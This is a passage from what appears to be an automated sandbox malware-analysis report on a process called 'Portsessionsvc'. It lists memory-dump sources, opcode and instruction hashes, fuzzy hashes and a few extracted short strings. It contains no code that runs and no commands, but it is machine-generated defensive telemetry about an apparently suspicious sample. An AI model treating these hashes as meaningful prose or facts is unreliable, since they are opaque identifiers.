                                                              • Snapshot File: hcaresult_39_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f213c50215499450995a76fd97423c786ea4869def82481ed996932733a1a6a1
                                                              • Instruction ID: 4b6a06b41acc23438f7dcebd3c21f45e4ab54e5599ee749a45f6da057d38525a
                                                              • Opcode Fuzzy Hash: f213c50215499450995a76fd97423c786ea4869def82481ed996932733a1a6a1
                                                              • Instruction Fuzzy Hash: E9F03630709B1D4AE674EB44E8B4AB53391AF54701F1212B9D90ED71F3EE7C6B454504
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 02ef73dc90ffce9414ea8ab63213b3e8cc379f0c2466559ca730fd2c5fbc9bec
                                                              • Instruction ID: e84fcae9ad6c2e70ddba8a3231400df3fdd00eb8499688afd1799b603f63d25c
                                                              • Opcode Fuzzy Hash: 02ef73dc90ffce9414ea8ab63213b3e8cc379f0c2466559ca730fd2c5fbc9bec
                                                              • Instruction Fuzzy Hash: B2F0E530B587880FC7199A2958654617BF1DF5B20534A42FFD49ACB2A3DD28AC458741
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b790000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8131b47b867fc6b529868362e4b1c81cc5b27f3f3f8f66b61e33cd7e4fe003e0
                                                              • Instruction ID: b9e38a45d214338207375f53aaff6657e60c872d555f0b4c04b9511e9fa82ff3
                                                              • Opcode Fuzzy Hash: 8131b47b867fc6b529868362e4b1c81cc5b27f3f3f8f66b61e33cd7e4fe003e0
                                                              • Instruction Fuzzy Hash: ADF08935B0EB5F4BE635DA9898605BA7364EF05340B134379D41AD32F6DF38EA018680
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b790000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 480e1cf3399db463ee8d763d08c219c194c0af843d933756cacadf207396e873
                                                              • Instruction ID: 96c7d5dd94a90029190e827134d609d0d78527b473e1947ea4c465e17c4b37cd
                                                              • Opcode Fuzzy Hash: 480e1cf3399db463ee8d763d08c219c194c0af843d933756cacadf207396e873
                                                              • Instruction Fuzzy Hash: 08F0E52271AA444FC719B77CC8669F43BD0EF5622934D01F7E049CA1A3DC09D449C751
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c421ea41a7e7ff8a7e86527cfb9b4aa6c766f339f38d6ae638c6ffca413eee46
                                                              • Instruction ID: ed2c4dbbe90490d199d0fc8ea0ed0570fdc47263a940487e524eb35db3123ffd
                                                              • Opcode Fuzzy Hash: c421ea41a7e7ff8a7e86527cfb9b4aa6c766f339f38d6ae638c6ffca413eee46
                                                              • Instruction Fuzzy Hash: 6BE09230B1A7C44FCB0AAA3888684607BB1EF6720278952FFC445CB2E3D928DC89C741
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 76f6ea66b02311a99c5483d056f84c27f887406c0c6c2879f1a4957a8152e289
                                                              • Instruction ID: 8a3234a4baa453829ba6b0cd3672d9906f1e32dec699cc9203684cb2217197e4
                                                              • Opcode Fuzzy Hash: 76f6ea66b02311a99c5483d056f84c27f887406c0c6c2879f1a4957a8152e289
                                                              • Instruction Fuzzy Hash: 31E02625B4CC490AEB6CAA742CF25B07282DB85311B0502BAD02EC22DACC196C814281
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 431acb96b77fb28091be9bfc8ff89f9820b0fd51ebc010f25483a7aa505525dd
                                                              • Instruction ID: 418bc479a2730b1b89f34b398ef291d3a93538327c482a4cecd08725bfa39a09
                                                              • Opcode Fuzzy Hash: 431acb96b77fb28091be9bfc8ff89f9820b0fd51ebc010f25483a7aa505525dd
                                                              • Instruction Fuzzy Hash: 82E04F30A197844FCB0A9B2888699503BB0EF6B21178A40EBC049CF1F3E629DC48C752
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6a1b2f102a6176cb28416137329539e1ae1a6454c59c76c1dfc2125f6e29a98f
                                                              • Instruction ID: 8ff9a74c172d593a99d19d8d17c87831a92da2d8bf39a88eb2c060635687cbe1
                                                              • Opcode Fuzzy Hash: 6a1b2f102a6176cb28416137329539e1ae1a6454c59c76c1dfc2125f6e29a98f
                                                              • Instruction Fuzzy Hash: 38E0D863F0DE0D0EF2A4D55804B43B825C1DF58762F0603BAD00EC22B2FD281D414241
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bd23af48d80b9028cff80ca5e6856a8360942cf9daddfa76dd6e14908e1984cb
                                                              • Instruction ID: fdef9bf5e5cd33f083a5d342d4c5a74af720a8d6a8f45fec749f27a802b7c12e
                                                              • Opcode Fuzzy Hash: bd23af48d80b9028cff80ca5e6856a8360942cf9daddfa76dd6e14908e1984cb
                                                              • Instruction Fuzzy Hash: AAE08631A497804FC7095B2888A98543BB0DF6711278A40FBC005CF2B3D62DDC89C711
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b790000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ace303399836f14eb33aaf010cbd8b6679ae566b1ad7189f9ccf16d6c4b789ca
                                                              • Instruction ID: b61c8b3a24e5e9fe93ea92e9a5c6236a7505e948a5b4c10c68850a5d05c6efb2
                                                              • Opcode Fuzzy Hash: ace303399836f14eb33aaf010cbd8b6679ae566b1ad7189f9ccf16d6c4b789ca
                                                              • Instruction Fuzzy Hash: 6DD05E30B60A0D4B8B4CA62D8458430B3D2E7AA2067D45278940BC6295ED25ECC68B80
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2d59f36901ba77a1d5173b1770939f6bebda0635c63cd8e0b3e37dab8a24d587
                                                              • Instruction ID: 4b7b4d292ed0ec8a4721965bc28670ff99bf46d5edff54a11296b8e382a75cb2
                                                              • Opcode Fuzzy Hash: 2d59f36901ba77a1d5173b1770939f6bebda0635c63cd8e0b3e37dab8a24d587
                                                              • Instruction Fuzzy Hash: D5E01230F0DA1E46FBA49144C8A07E97394EF94312F1601B8D58EA33E1DD38AFC48A45
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                              • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                              • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                              • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b790000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                              • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                              • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                              • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: df427db11c4b8b1adbad613056556dcb95fb70cc3927cb4c4236a00b99d5bef6
                                                              • Instruction ID: 9092713a171e2d5dad25970d90dfa1a4dd6ca75999bd10eba25e6c1d4413d71b
                                                              • Opcode Fuzzy Hash: df427db11c4b8b1adbad613056556dcb95fb70cc3927cb4c4236a00b99d5bef6
                                                              • Instruction Fuzzy Hash: C8E0173150A7884FCB0BAB348CA99803FB0EE6B21178B01C7D045CF5B3EA598D89C762
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8cc84ed8f1dfa8a68fc1917448678c270b1a1f028bc4073e877321ca715a2d44
                                                              • Instruction ID: d23d908daa4caa6190485d6fb195fe7573d829f4088949ca24af75020e520b84
                                                              • Opcode Fuzzy Hash: 8cc84ed8f1dfa8a68fc1917448678c270b1a1f028bc4073e877321ca715a2d44
                                                              • Instruction Fuzzy Hash: 9AE04F31A4F7C04FC74B973488788507FA1DE5721074A45EEC085CF5B3D6198D49C701
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dc0893e6972b1db24272a6556afb45700994b964ecba2b9cc7463da4df9d0a74
                                                              • Instruction ID: bf4e0e619de8f275e65c4db50b820028ece5d949631a47f6ca0e263d6d0719b4
                                                              • Opcode Fuzzy Hash: dc0893e6972b1db24272a6556afb45700994b964ecba2b9cc7463da4df9d0a74
                                                              • Instruction Fuzzy Hash: 50E04F6194F7C04FC70B9B3588B88407F60EE2721178A45EEC085CF1B3E6198C49C701
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 70e04e2a095345de69a44cc4f4a7a3ebee4407e6c86ec40a26d25b3b58c45cbd
                                                              • Instruction ID: 226f5cdc0ad8bc2c5e4dff0f02c3e0c1f604d46dfeb201affb1b12e14cf5709f
                                                              • Opcode Fuzzy Hash: 70e04e2a095345de69a44cc4f4a7a3ebee4407e6c86ec40a26d25b3b58c45cbd
                                                              • Instruction Fuzzy Hash: B7E0EC3150A7844FC70A9B2488A99943FB0EF2621178A01EBC449CF5B3D6299888CB52
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                              • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                              • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                              • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cbfe45211ad73ac3c17ab894c132553cfacac7f021d9affde010218669dfca01
                                                              • Instruction ID: 70612281d9585890a6d6f4cf59acf35b8267b14e10d1c9ea082ef5e7cea4887d
                                                              • Opcode Fuzzy Hash: cbfe45211ad73ac3c17ab894c132553cfacac7f021d9affde010218669dfca01
                                                              • Instruction Fuzzy Hash: E9D01234B519044FC71CA63C886987473D1EB6A217B9541B9D00AD72B1D96ADD89CB41
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7479cc42ffc60ba2653225b21c49bf0392be7e12deb69c3dfb1531d468da8461
                                                              • Instruction ID: 7d5a485abe3f1a101fe236d7c12fdd607988a3ec4558fc01dadeabbbd6232ba3
                                                              • Opcode Fuzzy Hash: 7479cc42ffc60ba2653225b21c49bf0392be7e12deb69c3dfb1531d468da8461
                                                              • Instruction Fuzzy Hash: 6BD02230B649040FC70CAA3C88588307390EB6A20278100A8D00BD72B1E92ADD88CB40
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ba44e30b299232d18dd58396ab05012bbb058ffb7b5d4e444c28c93c79ff008a
                                                              • Instruction ID: 2a1721bd37c2c0e229c6edeb69d2e9e63533fe1581581a77562d8443ec22fc0d
                                                              • Opcode Fuzzy Hash: ba44e30b299232d18dd58396ab05012bbb058ffb7b5d4e444c28c93c79ff008a
                                                              • Instruction Fuzzy Hash: E7C0123062990E8FDA40BB28C8C9824BBA0FB0E202BDA01E4E00CC71B1D629A8908700
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 950bae476377a60c31a855be73f4e2c850538c4536ecd9311385f276679a1fd2
                                                              • Instruction ID: d706e9dff74a5d313b84353e58900511a62814fdd5b24ab6df09e354963bacab
                                                              • Opcode Fuzzy Hash: 950bae476377a60c31a855be73f4e2c850538c4536ecd9311385f276679a1fd2
                                                              • Instruction Fuzzy Hash: 16D05E65B1E7AA4AE764A6989C71BB97691AF44300F0506B4E41D836E7DC183C408E82
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a8057b2a2e29e7e3848875d95335190a1301d675519968e9b42c91e4c58ee40f
                                                              • Instruction ID: faff3e12c8c9fe63c49ea462aac9b206cb8c5b8a4464a0f790921376c9a1d048
                                                              • Opcode Fuzzy Hash: a8057b2a2e29e7e3848875d95335190a1301d675519968e9b42c91e4c58ee40f
                                                              • Instruction Fuzzy Hash: B7C04C05F5FF5F01E47531EE54E60ADB6409FC4A26FE31772D50D801B29C6E22D50196
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3787d7a6cd85340d052397785a9d428e4e8ed80fe274377175b62aa4ea2664cd
                                                              • Instruction ID: 693aefd0555aa7c13d0ffe86cffec59e3527bad17fa240652fc2ed9797b61d88
                                                              • Opcode Fuzzy Hash: 3787d7a6cd85340d052397785a9d428e4e8ed80fe274377175b62aa4ea2664cd
                                                              • Instruction Fuzzy Hash: 5CC08C30611C0C8FC908EB28C88480433A0FB09201BC200A0E00AC7170D229DCC0C740
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2c887ebbdf529bb6cbff72f160e5c3645b13314979461e80d37359e32bd5a576
                                                              • Instruction ID: 3972a79cbe887e9ff7602caff64bbf0cc6a2878d577b53beb1c338a249d8aad2
                                                              • Opcode Fuzzy Hash: 2c887ebbdf529bb6cbff72f160e5c3645b13314979461e80d37359e32bd5a576
                                                              • Instruction Fuzzy Hash: 04C08C04F18C1E4AF21B2B14043023D04434B84305F8941B0E41EC77DECC2D5F0202C6
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 807f6b4b69133c31bf548507f2ec2c4152f6a71d8028e8e319ca7a4a2011544e
                                                              • Instruction ID: 55681b21aa852a478038f68aa83c82495a066b141e3c6cd6be9a93864b0cfab4
                                                              • Opcode Fuzzy Hash: 807f6b4b69133c31bf548507f2ec2c4152f6a71d8028e8e319ca7a4a2011544e
                                                              • Instruction Fuzzy Hash: 9DB01200D5BD4F00E42431FB08D30647440AF84105FD30270E40C802B2986E12940282
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: c9$!k9$"s9$#{9
                                                              • API String ID: 0-1692736845
                                                              • Opcode ID: be64be5333022bf308476621d778135d585de084caa77ddb1cf8954df1b0d530
                                                              • Instruction ID: a8db8b9a5516349690576d0cceb03b37db2f7a8324dbcda29aa8caba863ed978
                                                              • Opcode Fuzzy Hash: be64be5333022bf308476621d778135d585de084caa77ddb1cf8954df1b0d530
                                                              • Instruction Fuzzy Hash: EE51CE0BB8E52A49E31933FD75618FC6B458FA5335B0843B7F06E890DB8E18608186E5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.2323089246.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_7ffd9b790000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 5X_H
                                                              • API String ID: 0-3241812158
                                                              • Opcode ID: cda3b3b9a2a49db45e9a8d53dbce9e35b29ddd3bddfe6d473363f1ae40d34459
                                                              • Instruction ID: 29f063182c57eca663751bf71670f82c3d3931722aacae5fc338d9f07f1de555
                                                              • Opcode Fuzzy Hash: cda3b3b9a2a49db45e9a8d53dbce9e35b29ddd3bddfe6d473363f1ae40d34459
                                                              • Instruction Fuzzy Hash: 369105B5A29A8D8FEB99DF6888B57A87FE1FF56310F0101BBD049C73E6DA7814108740
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.2323089246.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_7ffd9b790000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: U
                                                              • API String ID: 0-3372436214
                                                              • Opcode ID: a64e4ca41338474510a3bfb2628ff02e6f8860635833769286d06826ddaab96e
                                                              • Instruction ID: c8abf98dca80b4fb1aec9d02841c460e94c587880d9fa390742434886eb6e4f6
                                                              • Opcode Fuzzy Hash: a64e4ca41338474510a3bfb2628ff02e6f8860635833769286d06826ddaab96e
                                                              • Instruction Fuzzy Hash: 0D11C036A1D78D8FE712DBA4C8111ED7BA0EF42324F1646B7D4548B1E2D634264AC791
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.2323089246.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_7ffd9b790000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: V
                                                              • API String ID: 0-1342839628
                                                              • Opcode ID: 663a53c435943bc29737e5aaf8c8cb39bb1b7734148f7a22894987a16699d54e
                                                              • Instruction ID: b324fa3a7becc6f4f39abfd211d726124d72e55780d0522350f1a8565b9c1272
                                                              • Opcode Fuzzy Hash: 663a53c435943bc29737e5aaf8c8cb39bb1b7734148f7a22894987a16699d54e
                                                              • Instruction Fuzzy Hash: 4101F924A8E6C61FE7595BB44CB19F13B91DF8725070A01FAD099CB5F3C81D19578361
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.2323089246.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_7ffd9b790000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: U
                                                              • API String ID: 0-3372436214
                                                              • Opcode ID: aea27c60f233c48e2233d6ef2fa341ec4c2c2bb0506a7e3befbea505fe99521b
                                                              • Instruction ID: 917ddc79657ba49fe2da4ade51086b4f4301cee10d30782d1703e215eaa52abf
                                                              • Opcode Fuzzy Hash: aea27c60f233c48e2233d6ef2fa341ec4c2c2bb0506a7e3befbea505fe99521b
                                                              • Instruction Fuzzy Hash: EB11AC35A1978D8FE702EBA4C8612E87BB0EF42210F0645B7C094DB2A6D6382649CB91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.2323089246.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_7ffd9b790000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: U
                                                              • API String ID: 0-3372436214
                                                              • Opcode ID: 4c18391a3014c4dde4eb32e51ee4341c38fdf5c9cac5e78da8e728a83349f1b2
                                                              • Instruction ID: d3365500fcd90f49bac5e05c26d94a48c9e957562a9ddccc584a7510ef1bd345
                                                              • Opcode Fuzzy Hash: 4c18391a3014c4dde4eb32e51ee4341c38fdf5c9cac5e78da8e728a83349f1b2
                                                              • Instruction Fuzzy Hash: A301C035A197898FE702DB74C4601DDBFB0EF02310F0645F7C450DB2A6D6342649CB91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.2323089246.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_7ffd9b790000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: U
                                                              • API String ID: 0-3372436214
                                                              • Opcode ID: 44d91c9c540fe475553b4ed1a808cb7b3a4094fe12bf32e8e64b2dca6539a3d7
                                                              • Instruction ID: a07fbd840ced280cbd119d0474ae2a74cdf5e83c463dc4c645d994ddd64756c5
                                                              • Opcode Fuzzy Hash: 44d91c9c540fe475553b4ed1a808cb7b3a4094fe12bf32e8e64b2dca6539a3d7
                                                              • Instruction Fuzzy Hash: 5C01BC35A1D7898FD702EB74C8502DDBFB0AF02314F1642E7D050DB2A6DA386A48CB91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.2323089246.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_7ffd9b790000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: U
                                                              • API String ID: 0-3372436214
                                                              • Opcode ID: d3189b586fd52b41ca28fb5c64059233a67b79996656a0579e09ef001f36f8dc
                                                              • Instruction ID: 2fef9d0e9c0cd574a85d66ab402a9214d01c1d19bb19d73e39752cc3e46e95fd
                                                              • Opcode Fuzzy Hash: d3189b586fd52b41ca28fb5c64059233a67b79996656a0579e09ef001f36f8dc
                                                              • Instruction Fuzzy Hash: CB01AD34A1D7898FE702EBB4C4506DDBFF0AF02314F1542E6D450CB2A6DA386B48CB41
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.2323089246.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
